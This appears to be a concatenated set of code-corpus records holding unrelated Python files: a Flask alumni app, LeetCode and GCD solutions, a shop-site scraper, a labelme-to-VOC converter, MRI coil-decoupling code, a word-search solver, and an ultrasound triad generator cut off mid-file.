True)\n current_company = db.Column(db.String(100))\n current_position = db.Column(db.String(50))\n qualification = db.Column(db.String(200)) \n \n def __init__(self, current_company, current_position, qualification):\t\n\t self.current_company = current_company\n\t self.current_position = current_position\n\t self.qualification = qualification\n\t \n@app.route('/alumni_prof', methods = ['GET', 'POST'])\ndef alumni_prof():\n if request.method == 'POST':\n if not request.form['current_company'] or not request.form['current_position'] or not request.form['qualification']:\n flash('Please enter all the fields', 'error')\n else:\n alumni_professional = alumni_professional_details(request.form['current_company'], request.form['current_position'],request.form['qualification'])\n \n db.session.add(alumni_professional)\n db.session.commit()\n flash('Record was successfully added')\n return render_template('home1.html')\n\n return render_template('alumni_prof.html')\n \n \nclass feedback(db.Model):\n fid = db.Column('fid', db.Integer, primary_key = True)\n q1 = db.Column(db.String(100))\n q2 = db.Column(db.String(50))\n q3 = db.Column(db.String(200))\n q4 = db.Column(db.String(100))\n q5 = db.Column(db.String(50))\n q6 = db.Column(db.String(200)) \n q7 = db.Column(db.String(100))\n q8 = db.Column(db.String(50))\n q9 = db.Column(db.String(200)) \n q10 = db.Column(db.String(200))\n \n def __init__(self, q1, q2, q3, q4, q5, q6, q7, q8, q9, q10):\n\t self.q1 = q1\n\t self.q2 = q2\n\t self.q3 = q3\n\t self.q4 = q4\n\t self.q5 = q5\n\t self.q6 = q6\n\t self.q7 = q7\n\t self.q8 = q8\n\t self.q9 = q9\n\t self.q10 = q10\n\t \n\n@app.route('/feedback1', methods = ['GET', 'POST'])\ndef feedback1():\n if request.method == 'POST':\n if not request.form['q1'] or not request.form['q2'] or not request.form['q3'] or not request.form['q4'] or not request.form['q5'] or not request.form['q6'] or not request.form['q7'] or not request.form['q8'] or not request.form['q9'] or not request.form['q10']:\n flash('Please enter all the fields', 'error')\n else:\n feedb = feedback(request.form['q1'], request.form['q2'], request.form['q3'],request.form['q4'], request.form['q5'], request.form['q6'], request.form['q7'], request.form['q8'], request.form['q9'], request.form['q10'])\n \n db.session.add(feedb)\n db.session.commit()\n flash('Record was successfully added')\n return render_template('home1.html')\n return render_template('feedback1.html')\n\n\n \nif __name__ == '__main__':\n db.create_all()\n app.run(debug = True)\n","sub_path":"alumni/app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"101880599","text":"# Leetcode 199. Binary Tree Right Side View\n\n# Time Complexity : O(n) where n is the number of the nodes\n\n# Space Complexity :\n# BFS:: O(n/2) == O(n) where n is the number of the nodes that can be in the q at worst\n# DFS :: O(h) where h is the height of the tree\n\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n\n# Approach: DFS :: at every node if the current level matches the size of the result array, add the node\n# to result. Increment the level by 1 and call dfs recursively on left and right node.\n# BFS:: add the root to que, at every level append the last node to the result. If the left or \n# right child are present add them to the q. return result after q is empty \n\n# Your code here along with comments explaining your approach\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\n# DFS approach :: Traversing the tree recursively starting with the right sub tree first at every level\nclass Solution:\n result = None\n def rightSideView(self, root: TreeNode) -> List[int]:\n self.result = []\n if not root:\n return self.result\n self.dfs(root,0)\n return self.result\n \n def dfs(self,node,level):\n if not node:\n return\n # Updating rightSide view when the current level matches the size of the view array\n if level == len(self.result):\n self.result.append(node.val)\n # Traversing next level starting with right subtree \n self.dfs(node.right,level+1)\n self.dfs(node.left,level+1)\n\n\n# BFS approach\nfrom collections import deque\nclass Solution:\n result = None\n def rightSideView(self, root: TreeNode) -> List[int]:\n q = deque()\n q.append(root)\n result = []\n while q:\n size = len(q)\n # At every level append the last node to the result\n for i in range(len(q)):\n node = q.popleft()\n if i == size-1:\n result.append(node.val)\n # If the left or right child are present add them to the q\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n # return result after q is empty \n return result","sub_path":"BT_RightSide_View.py","file_name":"BT_RightSide_View.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"623725950","text":"import time\nfrom multiprocessing.pool import Pool\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nimport parsing_methods.shop as s\nimport parsing_methods.valueForParsing as v\nfrom parsing_methods.parsingAbstractClass import Parsing\n\n\nclass RequestsLetyShopsParsing(Parsing):\n def get_name_class(self):\n return type(self).__name__\n\n __address = 'https://letyshops.com/shops?page='\n\n def __init__(self):\n pass\n\n def parsing(self):\n \"\"\"Возвращает список элементов\"\"\"\n pool = Pool(processes=4)\n max_page = self.__get_max_page()\n all_items = pool.map(self.get_response, range(1, max_page + 1))\n result = pool.map(self.parse_elements, all_items)\n shops = []\n for items in result:\n for shop in items:\n shops.append(shop)\n return shops\n\n def get_response(self, i):\n url = \"https://letyshops.com/shops\"\n querystring = {\"page\": str(i)}\n payload = \"\"\n headers = {\n 'User-Agent': \"PostmanRuntime/7.11.0\",\n 'Accept': \"*/*\",\n 'Cache-Control': \"no-cache\",\n 'Postman-Token': \"03d403a9-0fb6-4893-826c-6f67e5b323e1,5b89c07f-246f-4436-aadd-fa711d08cf04\",\n 'Host': \"letyshops.com\",\n 'cookie': \"hl=ru_RU; country=RU%3A0; lsvtkn=d7ca64e7165cfd3175dddfa1cc11bf15\",\n 'accept-encoding': \"gzip, deflate\",\n 'Connection': \"keep-alive\",\n 'cache-control': \"no-cache\"\n }\n\n response = requests.request(\"GET\", url, data=payload, headers=headers, params=querystring)\n result = response.content\n return response.content\n\n def parse_elements(self, html):\n result = []\n soup = BeautifulSoup(html, 'lxml')\n shops = soup.find_all('div', class_='b-teaser')\n for shop in shops:\n name = self.__get_name(shop)\n discount = self.__get_discount(shop)\n label = self.__get_label(shop)\n url = self.__get_url(shop)\n image = self.__get_image(shop)\n item = s.Shop(name, discount, label, url, image)\n result.append(item)\n return result\n\n def __get_image(self, shop):\n image = shop.find('div', class_='b-teaser__cover').find('img').get('src')\n return image\n\n def __get_url(self, shop):\n url = shop.find('a', class_='b-teaser__inner').get('href')\n return v.clear_url_letyShops + url\n\n def __get_label(self, shop):\n label = shop.find_all('span', class_='b-shop-teaser__label')[-1]\n if label is None:\n label = shop.find('span', class_='b-shop-teaser__label--red')\n else:\n label = label.text.strip()\n return label\n\n def __get_discount(self, shop):\n discount = shop.find('span', class_='b-shop-teaser__cash')\n if discount is None:\n discount = shop.find('span', class_='b-shop-teaser__new-cash').text.strip()\n else:\n discount = discount.text.strip()\n return discount\n\n def __get_name(self, shop):\n name = shop.find('div', class_='b-teaser__title').text.strip()\n return name\n\n def print_array(self, array: []):\n if len(array) > 0:\n for item in array:\n print(item.__str__())\n else:\n print(\"Пустой список\")\n\n def __get_max_page(self):\n soup = BeautifulSoup(self.__get_Html(v.letyShops), 'lxml')\n new_pages = []\n pages = soup.find_all('a', class_='b-pagination__link')\n for page in pages:\n new_page = int(page.get('data-page'))\n new_pages.append(new_page)\n return max(new_pages)\n\n def __get_Html(self, url):\n try:\n r = requests.get(url)\n return r.text\n except ConnectionError as e:\n print(\"Error\")\n\n\nif __name__ == '__main__':\n parser = RequestsLetyShopsParsing()\n start = time.time()\n parser.parsing()\n print(time.time() - start)\n","sub_path":"parsing_methods/request_letyshops_parsing.py","file_name":"request_letyshops_parsing.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"106460256","text":"import re\nimport json\nimport os\nimport easygui\nimport time\n\ndef get_str_time():\n return time.strftime('%Y%m%d%H%M%S')\n\ndef get_files_in_dir(basepath,ext=[],debug=False):\n\n basepath=os.path.abspath(basepath)\n\n ext = [str.lower(x) for x in ext]\n\n try:\n if os.path.exists(basepath) and os.path.isdir(basepath):\n result=[os.path.join(basepath,x) for x in os.listdir(basepath)]\n files=[[os.path.split(x)[0],*os.path.splitext(os.path.basename(x))] for x in result if os.path.isfile(x)]\n if len(ext)==0:\n # print('无类型筛选,返回所有文件')\n if debug:print(files)\n return files\n\n if len(ext)>0 :\n # print('返回{}类型的文件'.format(ext))\n files=[[os.path.split(x)[0],*os.path.splitext(os.path.basename(x))] for x in result if str.lower(re.split(r'\\.',x)[-1]) in ext]\n if debug:print(files)\n return files\n else:\n return False\n except Exception as e:\n print('发生错误{}'.format(e))\n\ndef write_txt(filepath,txt):\n with open(filepath,'w',encoding='utf-8') as f:\n f.write(txt)\n\ndef clean_char_in_filename(s):\n return re.sub('[?、_()\\\\\\/*、<>|]', '-', s)\n\ndef parse(xml_path,output_file_path):\n print(xml_path)\n\n with open(xml_path, 'r', encoding='utf-8') as f:\n data= json.load(f)\n\n filename=data['imagePath']\n height=data['imageHeight']\n width=data['imageWidth']\n\n\n\n with open(output_file_path,'w',encoding='utf-8') as f:\n print(output_file_path)\n f.write('\\n')\n f.write('\\n')\n f.write('\\t{}\\n'.format(os.path.dirname(xml_path)))\n f.write('\\t{}\\n'.format(filename))\n f.write('\\t{}\\n'.format(xml_path))\n\n f.write('\\t\\n')\n f.write('\\t\\tUnknown\\n')\n f.write('\\t\\n')\n\n f.write('\\t\\n')\n f.write('\\t\\t{}\\n'.format(width))\n f.write('\\t\\t{}\\n'.format(height))\n f.write('\\t\\t{}\\n'.format(3))\n f.write('\\t\\n')\n\n f.write('\\t0\\n')\n\n for shape in data['shapes']:\n print(shape)\n xmin,ymin=shape['points'][0]\n xmax,ymax=shape['points'][1]\n name=shape['label']\n pose='Unspecified'\n truncated=difficult=0\n\n f.write('\\t\\n')\n f.write('\\t\\t{}\\n'.format(name))\n f.write('\\t\\t{}\\n'.format(pose))\n f.write('\\t\\t{}\\n'.format(truncated))\n f.write('\\t\\t{}\\n'.format(difficult))\n f.write('\\t\\t\\n')\n f.write('\\t\\t\\t{}\\n\\t\\t{}\\n\\t\\t{}\\n\\t\\t{}\\n'.format(xmin,ymin,xmax,ymax))\n f.write('\\t\\t\\n')\n f.write('\\t\\n')\n\n f.write('\\n')\n\ndef check_dir(d):\n d=os.path.abspath(d)\n if not os.path.exists(d):\n os.makedirs(d)\n return d\n\n\nsourcedir=easygui.diropenbox('选择要处理的目录','选择要处理的目录')\n\nsourcedir=check_dir(sourcedir)\noutputdir=check_dir('./voc_xml')\n\nfor basepath,filename,extname in get_files_in_dir(sourcedir,['json']):\n source_file_path=os.path.join(basepath,filename+extname)\n output_file_path=os.path.join(outputdir,filename+'.xml')\n xml=parse(source_file_path,output_file_path)\n\n","sub_path":"数据集处理/葛某-json转voc-20230518/labelme标注转voc.py","file_name":"labelme标注转voc.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"618413833","text":"# Python3 implementation of the approach\nfrom math import gcd as __gcd\n\n\n# Function to return the maximum\n# possible gcd after replacing\n# a single element\ndef MaxGCD(a, n):\n # Prefix and Suffix arrays\n Prefix = [0] * (n + 2);\n Suffix = [0] * (n + 2);\n\n # Single state dynamic programming relation\n # for storing gcd of first i elements\n # from the left in Prefix[i]\n Prefix[1] = a[0];\n\n for i in range(2, n + 1):\n Prefix[i] = __gcd(Prefix[i - 1], a[i - 1]);\n\n # Initializing Suffix array\n Suffix[n] = a[n - 1];\n\n # Single state dynamic programming relation\n # for storing gcd of all the elements having\n # index greater than or equal to i in Suffix[i]\n for i in range(n - 1, 0, -1):\n Suffix[i] = __gcd(Suffix[i + 1], a[i - 1]);\n\n # If first or last element of\n # the array has to be replaced\n ans = max(Suffix[2], Prefix[n - 1]);\n\n # If any other element is replaced\n for i in range(2, n):\n ans = max(ans, __gcd(Prefix[i - 1],\n Suffix[i + 1]));\n\n # Return the maximized gcd\n return ans;\n\n\n# Driver code\nif __name__ == \"__main__\":\n a = [6, 7, 8];\n n = len(a);\n\n print(MaxGCD(a, n));\n\n# This code is contributed by AnkitRai01\n","sub_path":"codeforce/f3.py","file_name":"f3.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"283346452","text":"from sys import path as syspath\nfrom python.mri_python.varian_read_file import *\nfrom scipy.ndimage.morphology import binary_dilation\nfrom scipy.linalg import lstsq,inv\nfrom numpy.fft import *\nfrom numpy.random import permutation\n#from pylab import figure,plot,subplot,show,imshow,colorbar,cm\n\ndef fetch_grappa4prof_data(inputAcq,petable,remove_ppeshift=True,dcplppeadj=None): \n #retrieve and reconstruct 4 2D \"grappa profiles\" from fid file\n nmice = inputAcq.nmice\n nacq = int(get_dict_value(inputAcq.param_dict,'np',1)/2)\n nro = int(get_dict_value(inputAcq.param_dict,'nro',1))\n nv = int(get_dict_value(inputAcq.param_dict,'nv',1))\n nv2 = int(get_dict_value(inputAcq.param_dict,'nv2',1))\n grappafov = int(get_dict_value(inputAcq.param_dict,'grappafov',1))\n nrcvrs = inputAcq.nrcvrs\n if (nmice>nrcvrs):\n nmice=nrcvrs\n t1_array = parse_petable_file(petable,'t1')\n t2_array = parse_petable_file(petable,'t2')\n mm_ppe = array(get_dict_value(inputAcq.param_dict,'mm_ppe',[0,0,0,0])).astype(float)\n lpe = get_dict_value(inputAcq.param_dict,'lpe',2.56)\n if (dcplppeadj==None):\n dcplppeadj = zeros((len(mm_ppe),),float) \n #identify large fov data (even if not centred)\n pegrid = zeros((nv2*grappafov,nv*grappafov),int)\n pegrid[t2_array+(int(nv2/2)-1)*grappafov,t1_array+(int(nv/2)-1)*grappafov] = 1\n fovmask = zeros(pegrid.shape,int)\n fovmask[1:-1,1:-1] = ((pegrid[0:-2,0:-2] + pegrid[1:-1,0:-2] + pegrid[2::,0:-2] + \\\n pegrid[0:-2,1:-1] + pegrid[1:-1,1:-1] + pegrid[2::,1:-1] + \\\n pegrid[0:-2,2::] + pegrid[1:-1,2::] + pegrid[2::,2::] ) > 2)*(pegrid[1:-1,1:-1]>0)\n i2,i1 = nonzero(fovmask)\n inds=array([],int)\n for j in range(len(i2)):\n inds = append(inds,nonzero( ((t2_array+(int(nv2/2)-1)*grappafov)==i2[j])&((t1_array+(int(nv/2)-1)*grappafov)==i1[j]) )[0] )\n grappapix = max(t2_array[inds])-min(t2_array[inds])+2\n grappapix = min(grappapix,max(t1_array[inds])-min(t1_array[inds])+2) \n raw_data = zeros((nmice,4,grappapix,nacq),complex)\n n_grabs = zeros((4,grappapix),int)\n t1cen = (max(t1_array[inds])+min(t1_array[inds]))/2; t1min = min(t1_array[inds])-int(mean(t1_array[inds]))\n t2cen = (max(t2_array[inds])+min(t2_array[inds]))/2; t2min = min(t2_array[inds])-int(mean(t2_array[inds]))\n if (remove_ppeshift):\n if (len(dcplppeadj)0,n_grabs,1)\n raw_data = raw_data/n_grabs[newaxis,:,:,newaxis]\n if (get_dict_value(inputAcq.param_dict,'sgflag','n')=='y'):\n maxind = raw_data.shape[-1]-nro+argmax(abs(raw_data[0,0,grappapix//2,-nro::]))\n endpt = [maxind+int(nro/2),nacq-1][maxind+int(nro/2)>=nacq]\n startpt = endpt-nro\n else:\n startpt = 0\n endpt = nro\n if (nro>nacq):\n print(\"ERROR: nro and np appear to be set inconsistently!!!\")\n endpt = nacq\n profs = fftshift(fft2(fftshift(raw_data[:,:,:,startpt:endpt],axes=(-2,-1)),axes=(-2,-1)),axes=(-2,-1))\n return profs,0.5*(startpt+endpt),delppe\n\n\ndef mask_gappa4prof_data(maskshape,inputAcq):\n #profile directions/order established in fetch_grappa4prof_data\n #should really pass this or detect it\n prof_direc=array([[1,0,1],\n [0,1,1],\n [1,1,1],\n [1,-1,1]],int)\n masks = zeros(maskshape,bool)\n #assume fov and mm_pro,mm_ppe and mm_ppe2 specify cylinder, orient specifies direction\n mm_ppe = array(get_dict_value(inputAcq.param_dict,'mm_ppe',[0,5.2,0,-5.4,-5.5,0,5.2,0,0,0,0,0,0,0,0,0])).astype(float)\n mm_ppe2 = array(get_dict_value(inputAcq.param_dict,'mm_ppe2',[0,-3,-6,-3,2.7,6,3,0,0,0,0,0,0,0,0,0,0])).astype(float)\n grappafov = get_dict_value(inputAcq.param_dict,'grappafov',8)\n lpe = get_dict_value(inputAcq.param_dict,'lpe',2.02)\n lpe2 = get_dict_value(inputAcq.param_dict,'lpe2',2.02)\n nmice = inputAcq.nmice\n nrcvrs = inputAcq.nrcvrs\n nmice = [nmice,nrcvrs][nmice>nrcvrs]\n ROIwidth = int( 1.5*maskshape[-2]/int(grappafov) )\n for j in range(nmice):\n for k in range(4): #4 profiles\n #fov and pixshift differences on diagonal axes taken care of by using unnormalized prof_direc in pixoffset calc\n pixoffset = maskshape[-2]*( (mm_ppe2[j]/(grappafov*lpe2))*prof_direc[k,0]+ \n (mm_ppe[j] /(grappafov*lpe ))*prof_direc[k,1] )\n ROIinds = ( (pixoffset+maskshape[-2]/2+arange(ROIwidth)-ROIwidth/2)%maskshape[-2] ).astype(int)\n masks[j,k,ROIinds,:] = 1\n return masks\n\n\ndef find_axis_shift(imgdata1,maskdata1,imgdata2,maskdata2,start=-10,end=10,step=0.5,axis=-1):\n phaseramp=exp(1.j*(arange(imgdata1.shape[axis])-imgdata1.shape[axis]/2)*2*pi/imgdata1.shape[axis])\n steps=arange(start,end,step)\n cmask=(maskdata1!=maskdata2)\n if (not cmask.any()): cmask=ones(maskdata1.shape,bool)\n C = zeros((len(steps),),float)\n for j in range(len(steps)):\n pixshift = steps[j]\n imgdata1adj = fftshift(ifft(fftshift((phaseramp)**(pixshift/2.0)*\n fftshift(fft(fftshift(imgdata1,axes=(axis,)),axis=axis),axes=(axis,)),axes=(axis,)),axis=axis),axes=(axis,))\n imgdata2adj = fftshift(ifft(fftshift((phaseramp)**(-pixshift/2.0)*\n fftshift(fft(fftshift(imgdata2,axes=(axis,)),axis=axis),axes=(axis,)),axes=(axis,)),axis=axis),axes=(axis,))\n v1=abs(imgdata1adj)[cmask]\n v2=abs(imgdata2adj)[cmask]\n mv1=mean(v1)\n mv2=mean(v2)\n C[j] = sum((v1-mv1)*(v2-mv2))/sqrt(sum((v1-mv1)**2)*sum((v2-mv2)**2))\n i1 = argmax(C)\n istart = [0,i1-5][i1-5>0]\n iend = [len(steps),i1+5][i1+5end) or (bestshiftnpts_lstsq):\n rinds = argsort(abs(profs[k])[i3,i2,i1])[-npts_lstsq::]\n i3=i3[rinds]; i2=i2[rinds]; i1=i1[rinds]\n b=append(profs[cgrp[j]].real[i3,i2,i1],profs[cgrp[j]].imag[i3,i2,i1])\n A=zeros([2*len(i1),2],float)\n A[0:len(i1),0] = profs[k].real[i3,i2,i1]\n A[0:len(i1),1] = -profs[k].imag[i3,i2,i1]\n A[len(i1)::,0] = profs[k].imag[i3,i2,i1]\n A[len(i1)::,1] = profs[k].real[i3,i2,i1]\n cres,resid,rank,s = lstsq(A,b)\n Cij[cgrp[j],k] = cres[0]+1.j*cres[1]\n invCij = inv(Cij)\n print(invCij)\n return invCij\n\ndef output_grappa_profs(profs,dcpl_data,dcpl_profs_output_name,masks=None):\n profsmod = profs\n from pylab import figure,imshow,subplot,savefig\n for j in range(profs.shape[0]):\n figure(j+1);\n for k in range(4): #always 4 profiles\n if (masks!=None):\n edges = sqrt( abs(masks[j,k,:,:]-roll(masks[j,k,:,:],-1,axis=-2))**2+\n abs(masks[j,k,:,:]-roll(masks[j,k,:,:],-1,axis=-1))**2 )\n maxsig = max(abs(profsmod[j,k,:,:]).flat)\n imgaspect = float(profs.shape[-1])/float(profs.shape[-2])\n if (imgaspect<0.6): imgaspect=0.6\n subplot(2,2,k+1); imshow(where(edges>0.5,maxsig,abs(profsmod[j,k,:,:])), \n interpolation='nearest',aspect=imgaspect)\n else:\n subplot(2,2,k+1); imshow(abs(profsmod[j,k,:,:]))\n c_outname = dcpl_profs_output_name[:-4]+\"_%d\"%j+dcpl_profs_output_name[-4:]\n savefig(c_outname)\n print(\"Output decoupling profile for coil#%d to %s...\"%(j,c_outname))\n return None\n\nclass decouple_info:\n def __init__(self,roposition,invCij,rok0index,nro,ppeshift):\n self.roposition=roposition\n self.invCij=invCij\n self.rok0index=int(rok0index)\n self.nro=int(nro)\n self.ppeshift=ppeshift\n\ndef gen_decoupling_info(inputAcq,petable,cplgrps_string=\"0,2,5;1,3,4,6\",\n dcplppeadj=None,remove_ppeshift=True,dcpl_profs_output_name=None):\n print('Generating coil decoupling coefficients and offsets...')\n profs,rok0index,delppe = fetch_grappa4prof_data(inputAcq,petable,remove_ppeshift=remove_ppeshift,dcplppeadj=dcplppeadj)\n masks = mask_gappa4prof_data(profs.shape,inputAcq)\n cplgrps = [[int(x) for x in grpstrings.split(',')] for grpstrings in cplgrps_string.split(';')]\n if (max([max(x) for x in cplgrps])>=profs.shape[0]):\n print(\"Inconsistency between grappa_coil_groupings and acquired channels...\")\n raise SystemExit\n profs,ropos = dcpl_axis_adjustment(profs,masks,cplgrps,nom_shift=int( inputAcq.param_dict['sw']/2000.0 ),axis=-1) \n invCij = find_coupling_coeffs(profs,masks,cplgrps)\n dcpl_data = decouple_info(ropos,invCij,rok0index,profs.shape[-1],delppe) \n if (dcpl_profs_output_name!=None):\n output_grappa_profs(profs,dcpl_data,dcpl_profs_output_name,masks=masks) \n return dcpl_data\n\n\n","sub_path":"python/mri_python/coil_decouple.py","file_name":"coil_decouple.py","file_ext":"py","file_size_in_byte":12428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"434448375","text":"def exist(board, word):\n k=0\n flag=False\n if(len(word)>len(board[0])*len(board)):\n return False\n if(len(word)==1):\n for i in range(len(board)):\n for j in range(len(board[i])):\n if(board[i][j]==word[k]):\n flag=True\n else:\n for i in range(len(board)):\n for j in range(len(board[i])):\n if(board[i][j]==word[0]):\n # k=k+1\n visited=[]\n visited.append((i,j))\n flag=checkNeighbors(1,word,board, i, j, visited)\n if(flag==True):\n return flag\n return flag\n\ndef checkNeighbors(k, word, board, i , j, visited):\n flag=False\n if(k==len(word)):\n #return True\n flag=True\n return flag\n if((i-1)>=0):\n if(board[i-1][j]==word[k] and (i-1,j) not in visited):\n flag=checkNeighbors(k+1,word,board,i-1,j, visited+[(i-1,j)])\n if(flag==True):\n return flag\n if((i+1)<=len(board)-1):\n if(board[i+1][j]==word[k] and (i+1,j) not in visited):\n flag=checkNeighbors(k+1,word,board,i+1,j, visited+[(i+1,j)])\n if(flag==True):\n return flag\n if((j-1)>=0):\n if(board[i][j-1]==word[k] and (i,j-1) not in visited):\n flag=checkNeighbors(k+1,word,board,i,j-1, visited+[(i,j-1)])\n if(flag==True):\n return flag\n if((j+1)<=len(board[i])-1):\n if(board[i][j+1]==word[k] and (i,j+1) not in visited):\n flag=checkNeighbors(k+1,word,board,i,j+1, visited+[(i,j+1)])\n if(flag==True):\n return flag\n return flag\n\nif __name__ == \"__main__\":\n board =[[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]]\n word = \"ABCB\"\n # word = \"AAB\"\n print(exist(board,word))\n\n","sub_path":"Board.py","file_name":"Board.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"162680511","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 9 18:20:45 2019\r\n\r\n@author: larun\r\n\"\"\"\r\n\r\n####\r\n### IMPORT LIBRARIES\r\n####\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom skimage import exposure\r\nimport os\r\nimport argparse\r\n#import matplotlib.pyplot as plt\r\nimport random\r\n\r\n####\r\n### HELPER FUNCTIONS\r\n#### \r\n\r\n# loads all us array paths\r\ndef get_pickle_files(file_dir):\r\n pickle_files = []\r\n for subdir, dirs, files in os.walk(file_dir):\r\n for file in files:\r\n if file.lower()[-7:] == \".pickle\":\r\n pickle_files.append(os.path.join(subdir, file))\r\n return pickle_files \r\n\r\n# load us seq's with specified contrast\r\ndef load_us_seq(pickle_file,opt):\r\n us_seq = pd.read_pickle(pickle_file) \r\n \r\n preproc_us = []\r\n for i in range(len(us_seq['images'])):\r\n img = us_seq['images'].iloc[i]\r\n preproc_us.append(set_contrast(img,opt))\r\n \r\n return preproc_us\r\n\r\n# function to set the image contrast\r\ndef set_contrast(image,opt):\r\n if opt.contrast == 0:\r\n out_img = image\r\n elif opt.contrast == 1:\r\n out_img = exposure.equalize_hist(image)\r\n elif opt.contrast == 2:\r\n out_img = exposure.equalize_adapthist(image)\r\n elif opt.contrast == 3:\r\n out_img = exposure.rescale_intensity(image) \r\n \r\n return out_img\r\n \r\n# create an array of positive triad samples and labels\r\ndef make_pos_samples(us_seq):\r\n pos_triads = []\r\n pos_triad_labels = []\r\n \r\n for k in range(len(us_seq) - 2):\r\n pos_triads.append([us_seq[k], us_seq[k+1], us_seq[k+2]])\r\n pos_triad_labels.append(1)\r\n pos_triads.append([us_seq[k+2], us_seq[k+1], us_seq[k]])\r\n pos_triad_labels.append(1)\r\n \r\n return pos_triads,pos_triad_labels\r\n\r\n# create an array of negative triad samples and labels\r\ndef make_neg_samples(us_seq):\r\n neg_triads = []\r\n neg_triad_labels = []\r\n \r\n for k in range(len(us_seq) - 2):\r\n neg_triads.append([us_seq[k], us_seq[k+2], us_seq[k+1]])\r\n neg_triad_labels.append(0)\r\n neg_triads.append([us_seq[k+1], us_seq[k+2], us_seq[k]])\r\n neg_triad_labels.append(0)\r\n neg_triads.append([us_seq[k+1], us_seq[k], us_seq[k+2]])\r\n neg_triad_labels.append(0)\r\n neg_triads.append([us_seq[k+1], us_seq[k+2], us_seq[k]])\r\n neg_triad_labels.append(0)\r\n \r\n neg_triads = random.sample(neg_triads,k=(2*(len(us_seq)-2)))\r\n neg_triad_labels = random.sample(neg_triad_labels,k=(2*(len(us_seq)-2)))\r\n \r\n return neg_triads,neg_triad_labels\r\n\r\n# get pandas df of an equal number of pos and neg training examples\r\ndef get_training_samples(us_seq):\r\n \r\n pos_triads,pos_labels = make_pos_samples(us_seq)\r\n neg_triads,neg_labels = make_neg_samples(us_seq)\r\n \r\n training_triads = pos_triads + neg_triads\r\n triad_labels = pos_labels + neg_labels \r\n \r\n pre_df = {'triad' : training_triads, 'label' : triad_labels}\r\n training_df = pd.DataFrame(pre_df)\r\n \r\n return training_df\r\n\r\ndef train_test_assg(n_us_seqs,test_prob = 0.2):\r\n return np.random.choice([\"train\",\"test\"],n_us_seqs,p=[1-test_prob,test_prob])\r\n \r\n## get out file name based on in file name for pandas df using pickle \r\ndef get_out_file_name(in_file,group=\"train\"):\r\n if group==\"train\":\r\n out_file_name = in_file.split(\"/\")[-1][:-7] + \"_us_seq_training.pickle\"\r\n elif group==\"test\":\r\n out_file_name = in_file.split(\"/\")[-1][:-7] + \"_us_seq_test.pickle\"\r\n \r\n return out_file_name\r\n\r\n## function by Marta Skreta to image with different contrast settings\r\n# =============================================================================\r\n# def view_sample_images(img):\r\n# plt.figure()\r\n# plt.subplot(2, 2, 1)\r\n# plt.imshow(img, cmap='gray')\r\n# rescaled_cropped_image = exposure.equalize_hist(img)\r\n# plt.subplot(2, 2, 2)\r\n# plt.imshow(rescaled_cropped_image, cmap='gray')\r\n# rescaled_cropped_image = exposure.equalize_adapthist(img)\r\n# plt.subplot(2, 2, 3)\r\n# plt.imshow(rescaled_cropped_image, cmap='gray')\r\n# rescaled_cropped_image = exposure.rescale_intensity(img)\r\n# plt.subplot(2, 2, 4)\r\n# plt.imshow(rescaled_cropped_image, cmap='gray')\r\n# plt.show()\r\n# =============================================================================\r\n \r\n# =============================================================================\r\n# def plot_triads(triad):\r\n# plt.figure()\r\n# plt.subplot(1,3,1)\r\n# plt.imshow(triad[0],cmap='gray')\r\n# plt.subplot(1,3,2)\r\n# plt.imshow(triad[1],cmap='gray')\r\n# plt.subplot(1,3,3)\r\n# plt.imshow(triad[2],cmap='gray')\r\n# plt.show()\r\n# =============================================================================\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-in_dir', default='/hpf/largeprojects/agoldenb/lauren/Hydronephrosis/train-us-seqs/', help=\"directory of ultrasound sequences\")\r\n parser.add_argument('-train_dir', default='/hpf/largeprojects/agoldenb/lauren/Hydronephrosis/triad_model/training_samples/', help=\"output directory of training triads\")\r\n parser.add_argument('-test_dir', default='/hpf/largeprojects/agoldenb/lauren/Hydronephrosis/triad_model/test_samples/', help=\"output directory of test triads\")\r\n parser.add_argument('-contrast', default=0, \r\n help=\"Maybe check contrast beforehand! 0 = original image, 1 = exposure.equalize_hist(image), 2 = exposure.equalize_adapthist(image), 3 = exposure.rescale_intensity(image)\")\r\n\r\n opt = parser.parse_args()\r\n \r\n pickle_files = get_pickle_files(opt.in_dir)\r\n \r\n train_test_split = train_test_assg(len(pickle_files))\r\n\r\n i = 0 \r\n for file in pickle_files:\r\n train_vs_test = train_test_split[i] \r\n us_seq = load_us_seq(file,opt)\r\n \r\n try:\r\n training_df = get_training_samples(us_seq) \r\n if train_vs_test == \"train\":\r\n out_file = os.path.join(opt.train_dir,get_out_file_name(file,group = \"train\"))\r\n #os.makedirs(os.path.dirname(out_file), exist_ok=True)\r\n training_df.to_pickle(out_file)\r\n elif train_vs_test == \"test\":\r\n out_file = os.path.join(opt.test_dir,get_out_file_name(file,group = \"test\"))\r\n #os.makedirs(os.path.dirname(out_file), exist_ok=True)\r\n training_df.to_pickle(out_file)\r\n except:\r\n print(\"Error getting training samples for: \" + file)\r\n i=i+1\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n## DEBUG MAIN_FUNCTION\r\n# =============================================================================\r\n# class 